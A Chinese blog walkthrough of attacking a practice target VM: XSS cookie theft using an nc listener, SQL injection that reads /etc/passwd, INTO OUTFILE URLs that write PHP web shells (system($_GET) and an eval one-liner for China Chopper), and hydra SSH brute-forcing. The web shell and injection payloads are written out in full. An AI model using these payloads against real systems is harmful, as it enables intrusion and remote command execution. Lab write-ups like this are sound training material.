php %3c php 攻击,web 攻击靶机解题过程

sql注入靶机攻击过程请参考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶机的攻击过程请参考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

在192.168.179.129机器上打开网页:

05f73307a9b7d3965e775d8e935fb819.png

是个博客系统。

每个博客标题下面可以评价:

3c35f636b7f27d1bbac97384a224c9be.png

测试下是否存在xss漏洞。

发现提交后有弹出框:

fc1dcc2f41c35a59bd5f5f283095f8da.png

进一步构造内容

同时在192.168.179.142机器上用nc打开80端口。

e41404e9cbce091e8d9330defb95e5ad.png

在原来机器上登陆admin账户,密码是p4ssw0rd

1fcb7977b2b0352b941b82def214b700.png

登陆进去后查看刚才发布的评论话题。

接着在142这台机器查看nc的返回内容。

0bd2052be2ee3514559b78cad6cb4bce.png

获取到cookie信息。

复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。

5ad2942e31b28e85540c4056efebedbd.png

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

9e9de757f41b3306b1bcb6aae94f2bab.png

http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4

发现2和3可以显示出来。

8dde89459fc924f94064c6d92259ebcf.png

http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

31a362c1121e23f38ab1c5d20b20a898.png

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

7404455775c45336551d3feb16b93fb4.png

在查看源码时发现有css目录

1403a02dff1b402b7924cc9c2eda9143.png

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.130/css/s.php

显示:

726ffaee1cf4b5c605a53bb3198cd162.png

说明s.php文件成功写入到/var/www/css 目录,下面将

写入z.php中,构造url为:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

de099ecc2e6a8dd7d28182004a357e78.png

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀链接:

d530b2c305a5dd7881f66e12855a4e61.png

之前发现机器开了ssh,因此用hydra爆破下:

e703f1db643eb82b8e9a33543ad51530.png

ssh登陆

cfa4dd8f711aaad76051a44573eda573.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值